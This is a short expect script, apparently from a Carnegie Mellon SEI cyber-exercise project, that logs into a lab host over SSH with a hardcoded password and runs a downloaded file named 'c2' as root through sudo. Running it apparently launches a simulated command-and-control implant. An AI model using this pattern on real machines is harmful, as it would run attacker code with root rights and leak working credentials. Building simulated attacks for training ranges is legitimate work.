#!/usr/bin/expect -f

# Copyright 2022 Carnegie Mellon University.
# Released under a MIT (SEI)-style license, please see LICENSE.md in the project 
# root or contact permission@sei.cmu.edu for full terms.

set timeout 10
spawn -noecho ssh boy@192.168.133.44 "sudo bash /home/boy/Downloads/c2"
expect "ssword:"
send "kr@t05\r"
expect eof
exit
